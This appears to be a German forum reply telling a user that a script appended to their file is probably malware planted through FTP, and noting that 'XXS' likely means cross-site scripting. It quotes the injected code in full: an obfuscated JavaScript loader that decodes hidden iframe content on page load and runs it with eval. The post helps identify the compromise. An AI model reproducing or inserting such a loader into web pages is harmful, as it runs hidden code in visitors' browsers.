Der Code am Ende Deiner Datei gehört da bestimmt nicht hin.
Hast Du Dir vielleicht einen Virus gefangen, der mittels FTP Deinen Server infiziert hat?
<script>
window.onload=function(){
var gkaezwod=parseInt;
qtpwk=document.getElementById("arxg").contentWindow.document.getElementById("ygvgp");
vrfvmwm="";
for(jchuin=0;jchuin<qtpwk.innerHTML.length;jchuin+=2)
vrfvmwm+=String.fromCharCode(gkaezwod(qtpwk.innerHTML.substr(jchuin,2),28)-180);
eval(vrfvmwm);
}
</script>
XXS kenne ich auch nicht, könnte aber XSS, also Cross Site Scripting gemeint sein.